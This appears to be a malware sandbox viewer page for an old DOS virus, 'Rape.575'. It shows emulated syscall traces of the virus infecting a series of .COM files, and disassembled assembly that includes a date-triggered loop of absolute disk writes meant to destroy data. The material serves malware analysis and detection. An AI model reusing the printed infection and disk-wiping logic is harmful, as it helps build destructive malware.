Sample viewer

vx.netlux.org/Virus.DOS.Rape.575

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:00:04.392137655Z 255 PC: 1348f | UNKNOWN!
2018-12-17T23:00:04.393993143Z 44 PC: 1349b | Get time 0x1349b: and dl, 0xf
0x1349e: or dl, dl
0x134a0: jne 0x134ac
0x134a2: mov ah, 9
0x134a4: mov dx, si
0x134a6: add dx, 0x218
0x134aa: int 0x21
0x134ac: mov ah, 0x2a
0x134ae: int 0x21
0x134b0: cmp dl, 0xd
0x134b3: jne 0x134d8
0x134b5: xor ax, ax
0x134b7: int 0x10
0x134b9: mov ah, 9
0x134bb: mov dx, si
0x134bd: add dx, 0x1ca
0x134c1: int 0x21
0x134c3: mov ax, 2
0x134c6: mov cx, 0xff
0x134c9: xor dx, dx
2018-12-17T23:00:04.396149539Z 42 PC: 134b0 | Get date 0x134b0: cmp dl, 0xd
0x134b3: jne 0x134d8
0x134b5: xor ax, ax
0x134b7: int 0x10
0x134b9: mov ah, 9
0x134bb: mov dx, si
0x134bd: add dx, 0x1ca
0x134c1: int 0x21
0x134c3: mov ax, 2
0x134c6: mov cx, 0xff
0x134c9: xor dx, dx
0x134cb: push ax
0x134cc: int 0x26
0x134ce: popf
0x134cf: pop ax
0x134d0: inc ax
0x134d1: cmp ax, 0x1a
0x134d4: jb 0x134c6
0x134d6: jmp 0x134c3
0x134d8: mov bp, 0
2018-12-17T23:00:04.399216411Z 78 PC: 134e7 | Find first file
2018-12-17T23:00:04.405598498Z 67 PC: 134ff | Get or set file attributes
2018-12-17T23:00:04.422084011Z 61 PC: 13505 | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:00:04.428515175Z 63 PC: 13516 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:00:04.435506792Z 66 PC: 1353f | Move file pointer
2018-12-17T23:00:04.436980868Z 87 PC: 135a0 | Get or set file date and time
2018-12-17T23:00:04.438489803Z 62 PC: 135a4 | Close file
2018-12-17T23:00:04.446046357Z 67 PC: 135b0 | Get or set file attributes
2018-12-17T23:00:04.458386035Z 79 PC: 135b9 | Find next file
2018-12-17T23:00:04.462375924Z 67 PC: 134ff | Get or set file attributes
2018-12-17T23:00:04.472322453Z 61 PC: 13505 | Open file (Filename = 'PRINT.COM')
2018-12-17T23:00:04.478711056Z 63 PC: 13516 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:00:04.484797178Z 66 PC: 1353f | Move file pointer
2018-12-17T23:00:04.485915499Z 87 PC: 135a0 | Get or set file date and time
2018-12-17T23:00:04.487566809Z 62 PC: 135a4 | Close file
2018-12-17T23:00:04.494317586Z 67 PC: 135b0 | Get or set file attributes
2018-12-17T23:00:04.503737413Z 79 PC: 135b9 | Find next file
2018-12-17T23:00:04.509704751Z 67 PC: 134ff | Get or set file attributes
2018-12-17T23:00:04.519132225Z 61 PC: 13505 | Open file (Filename = 'HELLO.COM')
2018-12-17T23:00:04.530688332Z 63 PC: 13516 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:00:04.537221501Z 66 PC: 1353f | Move file pointer
2018-12-17T23:00:04.538473848Z 87 PC: 135a0 | Get or set file date and time
2018-12-17T23:00:04.53965648Z 62 PC: 135a4 | Close file
2018-12-17T23:00:04.546585728Z 67 PC: 135b0 | Get or set file attributes
2018-12-17T23:00:04.555856993Z 79 PC: 135b9 | Find next file
2018-12-17T23:00:04.558196451Z 67 PC: 134ff | Get or set file attributes
2018-12-17T23:00:04.568405456Z 61 PC: 13505 | Open file (Filename = 'PHANG.COM')
2018-12-17T23:00:04.575349356Z 63 PC: 13516 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:00:04.58187619Z 66 PC: 1353f | Move file pointer
2018-12-17T23:00:04.584264684Z 87 PC: 135a0 | Get or set file date and time
2018-12-17T23:00:04.586237883Z 62 PC: 135a4 | Close file
2018-12-17T23:00:04.593832653Z 67 PC: 135b0 | Get or set file attributes
2018-12-17T23:00:04.617896287Z 79 PC: 135b9 | Find next file
2018-12-17T23:00:04.620703993Z 67 PC: 134ff | Get or set file attributes
2018-12-17T23:00:04.63056825Z 61 PC: 13505 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T23:00:04.637500897Z 63 PC: 13516 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:00:04.644042255Z 66 PC: 1353f | Move file pointer
2018-12-17T23:00:04.645785394Z 87 PC: 135a0 | Get or set file date and time
2018-12-17T23:00:04.648208435Z 62 PC: 135a4 | Close file
2018-12-17T23:00:04.655164957Z 67 PC: 135b0 | Get or set file attributes
2018-12-17T23:00:04.66766818Z 79 PC: 135b9 | Find next file
2018-12-17T23:00:04.670377455Z 67 PC: 134ff | Get or set file attributes
2018-12-17T23:00:04.680370585Z 61 PC: 13505 | Open file (Filename = 'MANDEL.COM')
2018-12-17T23:00:04.687196681Z 63 PC: 13516 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:00:04.694257137Z 66 PC: 1353f | Move file pointer
2018-12-17T23:00:04.696161088Z 87 PC: 135a0 | Get or set file date and time
2018-12-17T23:00:04.697876053Z 62 PC: 135a4 | Close file
2018-12-17T23:00:04.705724114Z 67 PC: 135b0 | Get or set file attributes
2018-12-17T23:00:04.71551192Z 79 PC: 135b9 | Find next file
2018-12-17T23:00:04.718046306Z 67 PC: 134ff | Get or set file attributes
2018-12-17T23:00:04.731437632Z 61 PC: 13505 | Open file (Filename = 'PAH.COM')
2018-12-17T23:00:04.738025658Z 63 PC: 13516 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:00:04.74521932Z 66 PC: 1353f | Move file pointer
2018-12-17T23:00:04.746724894Z 87 PC: 135a0 | Get or set file date and time
2018-12-17T23:00:04.748627849Z 62 PC: 135a4 | Close file
2018-12-17T23:00:04.755917882Z 67 PC: 135b0 | Get or set file attributes
2018-12-17T23:00:04.769639217Z 79 PC: 135b9 | Find next file
2018-12-17T23:00:04.772810414Z 67 PC: 134ff | Get or set file attributes
2018-12-17T23:00:04.782777978Z 61 PC: 13505 | Open file (Filename = 'TEST.COM')
2018-12-17T23:00:04.794938395Z 63 PC: 13516 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:00:04.817072962Z 87 PC: 135a0 | Get or set file date and time
2018-12-17T23:00:04.819027187Z 62 PC: 135a4 | Close file
2018-12-17T23:00:04.826243702Z 67 PC: 135b0 | Get or set file attributes
2018-12-17T23:00:04.836542063Z 79 PC: 135b9 | Find next file
2018-12-17T23:00:04.838937646Z 78 PC: 134e7 | Find first file
2018-12-17T23:00:04.84545574Z 67 PC: 134ff | Get or set file attributes
2018-12-17T23:00:04.855949829Z 61 PC: 13505 | Open file (Filename = '\SLEEP.COM')
2018-12-17T23:00:04.87226572Z 63 PC: 13516 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:00:04.878919211Z 66 PC: 1353f | Move file pointer
2018-12-17T23:00:04.881661521Z 87 PC: 135a0 | Get or set file date and time
2018-12-17T23:00:04.883162014Z 62 PC: 135a4 | Close file
2018-12-17T23:00:04.890608439Z 67 PC: 135b0 | Get or set file attributes
2018-12-17T23:00:04.901257586Z 79 PC: 135b9 | Find next file
2018-12-17T23:00:04.904015841Z 67 PC: 134ff | Get or set file attributes
2018-12-17T23:00:04.914583275Z 61 PC: 13505 | Open file (Filename = '\PRINT.COM')
2018-12-17T23:00:04.922472412Z 63 PC: 13516 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:00:04.928993644Z 66 PC: 1353f | Move file pointer
2018-12-17T23:00:04.930508196Z 87 PC: 135a0 | Get or set file date and time
2018-12-17T23:00:04.93266456Z 62 PC: 135a4 | Close file
2018-12-17T23:00:04.945029189Z 67 PC: 135b0 | Get or set file attributes
2018-12-17T23:00:04.954911694Z 79 PC: 135b9 | Find next file
2018-12-17T23:00:04.958312181Z 67 PC: 134ff | Get or set file attributes
2018-12-17T23:00:04.968342622Z 61 PC: 13505 | Open file (Filename = '\HELLO.COM')
2018-12-17T23:00:04.974940579Z 63 PC: 13516 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:00:04.982442833Z 66 PC: 1353f | Move file pointer
2018-12-17T23:00:04.984452638Z 87 PC: 135a0 | Get or set file date and time
2018-12-17T23:00:04.986971954Z 62 PC: 135a4 | Close file
2018-12-17T23:00:04.994953091Z 67 PC: 135b0 | Get or set file attributes
2018-12-17T23:00:05.005491847Z 79 PC: 135b9 | Find next file
2018-12-17T23:00:05.008398227Z 67 PC: 134ff | Get or set file attributes
2018-12-17T23:00:05.018409523Z 61 PC: 13505 | Open file (Filename = '\PHANG.COM')
2018-12-17T23:00:05.025793789Z 63 PC: 13516 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:00:05.032271429Z 66 PC: 1353f | Move file pointer
2018-12-17T23:00:05.033813342Z 87 PC: 135a0 | Get or set file date and time
2018-12-17T23:00:05.035342542Z 62 PC: 135a4 | Close file
2018-12-17T23:00:05.043475518Z 67 PC: 135b0 | Get or set file attributes
2018-12-17T23:00:05.055921454Z 79 PC: 135b9 | Find next file
2018-12-17T23:00:05.059152004Z 67 PC: 134ff | Get or set file attributes
2018-12-17T23:00:05.06868155Z 61 PC: 13505 | Open file (Filename = '\PRINTA~1.COM')
2018-12-17T23:00:05.077230386Z 63 PC: 13516 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:00:05.085558868Z 66 PC: 1353f | Move file pointer
2018-12-17T23:00:05.087693425Z 87 PC: 135a0 | Get or set file date and time
2018-12-17T23:00:05.089992126Z 62 PC: 135a4 | Close file
2018-12-17T23:00:05.098602997Z 67 PC: 135b0 | Get or set file attributes
2018-12-17T23:00:05.10825149Z 79 PC: 135b9 | Find next file
2018-12-17T23:00:05.110796449Z 67 PC: 134ff | Get or set file attributes
2018-12-17T23:00:05.124096108Z 61 PC: 13505 | Open file (Filename = '\MANDEL.COM')
2018-12-17T23:00:05.131045737Z 63 PC: 13516 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:00:05.138082194Z 66 PC: 1353f | Move file pointer
2018-12-17T23:00:05.140468985Z 87 PC: 135a0 | Get or set file date and time
2018-12-17T23:00:05.141976805Z 62 PC: 135a4 | Close file
2018-12-17T23:00:05.148850828Z 67 PC: 135b0 | Get or set file attributes
2018-12-17T23:00:05.161718531Z 79 PC: 135b9 | Find next file
2018-12-17T23:00:05.164288267Z 67 PC: 134ff | Get or set file attributes
2018-12-17T23:00:05.17387243Z 61 PC: 13505 | Open file (Filename = '\PAH.COM')
2018-12-17T23:00:05.186064433Z 63 PC: 13516 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:00:05.192517401Z 66 PC: 1353f | Move file pointer
2018-12-17T23:00:05.193937486Z 87 PC: 135a0 | Get or set file date and time
2018-12-17T23:00:05.196087833Z 62 PC: 135a4 | Close file
2018-12-17T23:00:05.203163592Z 67 PC: 135b0 | Get or set file attributes
2018-12-17T23:00:05.213477341Z 79 PC: 135b9 | Find next file
2018-12-17T23:00:05.217292434Z 67 PC: 134ff | Get or set file attributes
2018-12-17T23:00:05.22709859Z 61 PC: 13505 | Open file (Filename = '\TEST.COM')
2018-12-17T23:00:05.233737095Z 63 PC: 13516 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:00:05.241346693Z 87 PC: 135a0 | Get or set file date and time
2018-12-17T23:00:05.242914567Z 62 PC: 135a4 | Close file
2018-12-17T23:00:05.252830685Z 67 PC: 135b0 | Get or set file attributes
2018-12-17T23:00:05.263623448Z 79 PC: 135b9 | Find next file
2018-12-17T23:00:05.272855259Z 9 PC: 131bd | Display string (Could not find end pointer)
2018-12-17T23:00:05.280365448Z 8 PC: 131c1 | Console input without echo

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":13415,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:38:10.970873191Z 255 PC: 1348f | UNKNOWN!
2018-12-25T12:38:10.972247889Z 44 PC: 1349b | Get time 0x1349b: and dl, 0xf
0x1349e: or dl, dl
0x134a0: jne 0x134ac
0x134a2: mov ah, 9
0x134a4: mov dx, si
0x134a6: add dx, 0x218
0x134aa: int 0x21
0x134ac: mov ah, 0x2a
0x134ae: int 0x21
0x134b0: cmp dl, 0xd
0x134b3: jne 0x134d8
0x134b5: xor ax, ax
0x134b7: int 0x10
0x134b9: mov ah, 9
0x134bb: mov dx, si
0x134bd: add dx, 0x1ca
0x134c1: int 0x21
0x134c3: mov ax, 2
0x134c6: mov cx, 0xff
0x134c9: xor dx, dx
2018-12-25T12:38:10.973947798Z 42 PC: 134b0 | Get date 0x134b0: cmp dl, 0xd
0x134b3: jne 0x134d8
0x134b5: xor ax, ax
0x134b7: int 0x10
0x134b9: mov ah, 9
0x134bb: mov dx, si
0x134bd: add dx, 0x1ca
0x134c1: int 0x21
0x134c3: mov ax, 2
0x134c6: mov cx, 0xff
0x134c9: xor dx, dx
0x134cb: push ax
0x134cc: int 0x26
0x134ce: popf
0x134cf: pop ax
0x134d0: inc ax
0x134d1: cmp ax, 0x1a
0x134d4: jb 0x134c6
0x134d6: jmp 0x134c3
0x134d8: mov bp, 0
2018-12-25T12:38:10.975633355Z 78 PC: 134e7 | Find first file
2018-12-25T12:38:10.980842174Z 67 PC: 134ff | Get or set file attributes
2018-12-25T12:38:10.996488935Z 61 PC: 13505 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:38:11.007680188Z 63 PC: 13516 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:38:11.014601153Z 66 PC: 1353f | Move file pointer
2018-12-25T12:38:11.016013999Z 87 PC: 135a0 | Get or set file date and time
2018-12-25T12:38:11.017989057Z 62 PC: 135a4 | Close file
2018-12-25T12:38:11.023895459Z 67 PC: 135b0 | Get or set file attributes
2018-12-25T12:38:11.032900299Z 79 PC: 135b9 | Find next file
2018-12-25T12:38:11.035523293Z 67 PC: 134ff | Get or set file attributes (See above)
2018-12-25T12:38:11.045509295Z 61 PC: 13505 | Open file (See above)
2018-12-25T12:38:11.053548653Z 63 PC: 13516 | Read file or device (See above)
2018-12-25T12:38:11.059838866Z 66 PC: 1353f | Move file pointer (See above)
2018-12-25T12:38:11.061416538Z 87 PC: 135a0 | Get or set file date and time (See above)
2018-12-25T12:38:11.063655052Z 62 PC: 135a4 | Close file (See above)
2018-12-25T12:38:11.070654364Z 67 PC: 135b0 | Get or set file attributes (See above)
2018-12-25T12:38:11.083294861Z 79 PC: 135b9 | Find next file (See above)
2018-12-25T12:38:11.086317168Z 67 PC: 134ff | Get or set file attributes (See above)
2018-12-25T12:38:11.099448786Z 61 PC: 13505 | Open file (See above)
2018-12-25T12:38:11.103591912Z 63 PC: 13516 | Read file or device (See above)
2018-12-25T12:38:11.107894318Z 66 PC: 1353f | Move file pointer (See above)
2018-12-25T12:38:11.109135265Z 87 PC: 135a0 | Get or set file date and time (See above)
2018-12-25T12:38:11.110452579Z 62 PC: 135a4 | Close file (See above)
2018-12-25T12:38:11.118022406Z 67 PC: 135b0 | Get or set file attributes (See above)
2018-12-25T12:38:11.127500416Z 79 PC: 135b9 | Find next file (See above)
2018-12-25T12:38:11.129885426Z 67 PC: 134ff | Get or set file attributes (See above)
2018-12-25T12:38:11.149128089Z 61 PC: 13505 | Open file (See above)
2018-12-25T12:38:11.156213791Z 63 PC: 13516 | Read file or device (See above)
2018-12-25T12:38:11.162314455Z 66 PC: 1353f | Move file pointer (See above)
2018-12-25T12:38:11.164058015Z 87 PC: 135a0 | Get or set file date and time (See above)
2018-12-25T12:38:11.165604852Z 62 PC: 135a4 | Close file (See above)
2018-12-25T12:38:11.172532731Z 67 PC: 135b0 | Get or set file attributes (See above)
2018-12-25T12:38:11.18268111Z 79 PC: 135b9 | Find next file (See above)
2018-12-25T12:38:11.184492825Z 67 PC: 134ff | Get or set file attributes (See above)
2018-12-25T12:38:11.191128217Z 61 PC: 13505 | Open file (See above)
2018-12-25T12:38:11.196045953Z 63 PC: 13516 | Read file or device (See above)
2018-12-25T12:38:11.199988301Z 66 PC: 1353f | Move file pointer (See above)
2018-12-25T12:38:11.201038579Z 87 PC: 135a0 | Get or set file date and time (See above)
2018-12-25T12:38:11.202768773Z 62 PC: 135a4 | Close file (See above)
2018-12-25T12:38:11.208714853Z 67 PC: 135b0 | Get or set file attributes (See above)
2018-12-25T12:38:11.216144923Z 79 PC: 135b9 | Find next file (See above)
2018-12-25T12:38:11.218701896Z 67 PC: 134ff | Get or set file attributes (See above)
2018-12-25T12:38:11.224793941Z 61 PC: 13505 | Open file (See above)
2018-12-25T12:38:11.228732831Z 63 PC: 13516 | Read file or device (See above)
2018-12-25T12:38:11.233680586Z 66 PC: 1353f | Move file pointer (See above)
2018-12-25T12:38:11.23472647Z 87 PC: 135a0 | Get or set file date and time (See above)
2018-12-25T12:38:11.235975644Z 62 PC: 135a4 | Close file (See above)
2018-12-25T12:38:11.242993445Z 67 PC: 135b0 | Get or set file attributes (See above)
2018-12-25T12:38:11.25296842Z 79 PC: 135b9 | Find next file (See above)
2018-12-25T12:38:11.255719999Z 67 PC: 134ff | Get or set file attributes (See above)
2018-12-25T12:38:11.266579657Z 61 PC: 13505 | Open file (See above)
2018-12-25T12:38:11.277936512Z 63 PC: 13516 | Read file or device (See above)
2018-12-25T12:38:11.284393313Z 66 PC: 1353f | Move file pointer (See above)
2018-12-25T12:38:11.28579951Z 87 PC: 135a0 | Get or set file date and time (See above)
2018-12-25T12:38:11.28741619Z 62 PC: 135a4 | Close file (See above)
2018-12-25T12:38:11.294265792Z 67 PC: 135b0 | Get or set file attributes (See above)
2018-12-25T12:38:11.303904077Z 79 PC: 135b9 | Find next file (See above)
2018-12-25T12:38:11.306846398Z 67 PC: 134ff | Get or set file attributes (See above)
2018-12-25T12:38:11.316181001Z 61 PC: 13505 | Open file (See above)
2018-12-25T12:38:11.32272155Z 63 PC: 13516 | Read file or device (See above)
2018-12-25T12:38:11.329082642Z 87 PC: 135a0 | Get or set file date and time (See above)
2018-12-25T12:38:11.33043805Z 62 PC: 135a4 | Close file (See above)
2018-12-25T12:38:11.339437247Z 67 PC: 135b0 | Get or set file attributes (See above)
2018-12-25T12:38:11.352317447Z 79 PC: 135b9 | Find next file (See above)
2018-12-25T12:38:11.354988616Z 78 PC: 134e7 | Find first file (See above)
2018-12-25T12:38:11.360769164Z 67 PC: 134ff | Get or set file attributes (See above)
2018-12-25T12:38:11.370478982Z 61 PC: 13505 | Open file (See above)
2018-12-25T12:38:11.377059544Z 63 PC: 13516 | Read file or device (See above)
2018-12-25T12:38:11.383450285Z 66 PC: 1353f | Move file pointer (See above)
2018-12-25T12:38:11.385411791Z 87 PC: 135a0 | Get or set file date and time (See above)
2018-12-25T12:38:11.387223778Z 62 PC: 135a4 | Close file (See above)
2018-12-25T12:38:11.394716772Z 67 PC: 135b0 | Get or set file attributes (See above)
2018-12-25T12:38:11.408126138Z 79 PC: 135b9 | Find next file (See above)
2018-12-25T12:38:11.411775466Z 67 PC: 134ff | Get or set file attributes (See above)
2018-12-25T12:38:11.421784401Z 61 PC: 13505 | Open file (See above)
2018-12-25T12:38:11.430252573Z 63 PC: 13516 | Read file or device (See above)
2018-12-25T12:38:11.437414558Z 66 PC: 1353f | Move file pointer (See above)
2018-12-25T12:38:11.439151775Z 87 PC: 135a0 | Get or set file date and time (See above)
2018-12-25T12:38:11.443093805Z 62 PC: 135a4 | Close file (See above)
2018-12-25T12:38:11.450371247Z 67 PC: 135b0 | Get or set file attributes (See above)
2018-12-25T12:38:11.460121433Z 79 PC: 135b9 | Find next file (See above)
2018-12-25T12:38:11.463501946Z 67 PC: 134ff | Get or set file attributes (See above)
2018-12-25T12:38:11.473189849Z 61 PC: 13505 | Open file (See above)
2018-12-25T12:38:11.485157925Z 63 PC: 13516 | Read file or device (See above)
2018-12-25T12:38:11.492026334Z 66 PC: 1353f | Move file pointer (See above)
2018-12-25T12:38:11.493405579Z 87 PC: 135a0 | Get or set file date and time (See above)
2018-12-25T12:38:11.494830669Z 62 PC: 135a4 | Close file (See above)
2018-12-25T12:38:11.502333276Z 67 PC: 135b0 | Get or set file attributes (See above)
2018-12-25T12:38:11.512366915Z 79 PC: 135b9 | Find next file (See above)
2018-12-25T12:38:11.514898178Z 67 PC: 134ff | Get or set file attributes (See above)
2018-12-25T12:38:11.525351845Z 61 PC: 13505 | Open file (See above)
2018-12-25T12:38:11.531956091Z 63 PC: 13516 | Read file or device (See above)
2018-12-25T12:38:11.538296269Z 66 PC: 1353f | Move file pointer (See above)
2018-12-25T12:38:11.540295311Z 87 PC: 135a0 | Get or set file date and time (See above)
2018-12-25T12:38:11.542479228Z 62 PC: 135a4 | Close file (See above)
2018-12-25T12:38:11.549405695Z 67 PC: 135b0 | Get or set file attributes (See above)
2018-12-25T12:38:11.559735912Z 79 PC: 135b9 | Find next file (See above)
2018-12-25T12:38:11.564661971Z 67 PC: 134ff | Get or set file attributes (See above)
2018-12-25T12:38:11.574673584Z 61 PC: 13505 | Open file (See above)
2018-12-25T12:38:11.581988164Z 63 PC: 13516 | Read file or device (See above)
2018-12-25T12:38:11.58838545Z 66 PC: 1353f | Move file pointer (See above)
2018-12-25T12:38:11.589834588Z 87 PC: 135a0 | Get or set file date and time (See above)
2018-12-25T12:38:11.598739291Z 62 PC: 135a4 | Close file (See above)
2018-12-25T12:38:11.60598558Z 67 PC: 135b0 | Get or set file attributes (See above)
2018-12-25T12:38:11.618754841Z 79 PC: 135b9 | Find next file (See above)
2018-12-25T12:38:11.622363631Z 67 PC: 134ff | Get or set file attributes (See above)
2018-12-25T12:38:11.632047621Z 61 PC: 13505 | Open file (See above)
2018-12-25T12:38:11.639033454Z 63 PC: 13516 | Read file or device (See above)
2018-12-25T12:38:11.64616031Z 66 PC: 1353f | Move file pointer (See above)
2018-12-25T12:38:11.647628823Z 87 PC: 135a0 | Get or set file date and time (See above)
2018-12-25T12:38:11.64910826Z 62 PC: 135a4 | Close file (See above)
2018-12-25T12:38:11.656856313Z 67 PC: 135b0 | Get or set file attributes (See above)
2018-12-25T12:38:11.666730088Z 79 PC: 135b9 | Find next file (See above)
2018-12-25T12:38:11.669606487Z 67 PC: 134ff | Get or set file attributes (See above)
2018-12-25T12:38:11.682477496Z 61 PC: 13505 | Open file (See above)
2018-12-25T12:38:11.68949528Z 63 PC: 13516 | Read file or device (See above)
2018-12-25T12:38:11.695730529Z 66 PC: 1353f | Move file pointer (See above)
2018-12-25T12:38:11.698097274Z 87 PC: 135a0 | Get or set file date and time (See above)
2018-12-25T12:38:11.700219987Z 62 PC: 135a4 | Close file (See above)
2018-12-25T12:38:11.70710478Z 67 PC: 135b0 | Get or set file attributes (See above)
2018-12-25T12:38:11.887625959Z 79 PC: 135b9 | Find next file (See above)
2018-12-25T12:38:11.891718289Z 67 PC: 134ff | Get or set file attributes (See above)
2018-12-25T12:38:11.956547825Z 61 PC: 13505 | Open file (See above)
2018-12-25T12:38:11.968639052Z 63 PC: 13516 | Read file or device (See above)
2018-12-25T12:38:11.976800397Z 87 PC: 135a0 | Get or set file date and time (See above)
2018-12-25T12:38:11.978704963Z 62 PC: 135a4 | Close file (See above)
2018-12-25T12:38:12.036091516Z 67 PC: 135b0 | Get or set file attributes (See above)
2018-12-25T12:38:12.046489493Z 79 PC: 135b9 | Find next file (See above)
2018-12-25T12:38:12.055617394Z 9 PC: 131bd | Display string (Could not find end pointer)
2018-12-25T12:38:12.062921614Z 8 PC: 131c1 | Console input without echo

{"DateBased":true,"Day":13,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":13415,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:38:11.04683128Z 255 PC: 1348f | UNKNOWN!
2018-12-25T12:38:11.048519312Z 44 PC: 1349b | Get time 0x1349b: and dl, 0xf
0x1349e: or dl, dl
0x134a0: jne 0x134ac
0x134a2: mov ah, 9
0x134a4: mov dx, si
0x134a6: add dx, 0x218
0x134aa: int 0x21
0x134ac: mov ah, 0x2a
0x134ae: int 0x21
0x134b0: cmp dl, 0xd
0x134b3: jne 0x134d8
0x134b5: xor ax, ax
0x134b7: int 0x10
0x134b9: mov ah, 9
0x134bb: mov dx, si
0x134bd: add dx, 0x1ca
0x134c1: int 0x21
0x134c3: mov ax, 2
0x134c6: mov cx, 0xff
0x134c9: xor dx, dx
2018-12-25T12:38:11.050936647Z 42 PC: 134b0 | Get date 0x134b0: cmp dl, 0xd
0x134b3: jne 0x134d8
0x134b5: xor ax, ax
0x134b7: int 0x10
0x134b9: mov ah, 9
0x134bb: mov dx, si
0x134bd: add dx, 0x1ca
0x134c1: int 0x21
0x134c3: mov ax, 2
0x134c6: mov cx, 0xff
0x134c9: xor dx, dx
0x134cb: push ax
0x134cc: int 0x26
0x134ce: popf
0x134cf: pop ax
0x134d0: inc ax
0x134d1: cmp ax, 0x1a
0x134d4: jb 0x134c6
0x134d6: jmp 0x134c3
0x134d8: mov bp, 0
2018-12-25T12:38:11.060768513Z 9 PC: 134c3 | Display string (String= 'Rage - RABID Int'nl Development Corp. By Data Disruptor - Thanks to Zodiac ')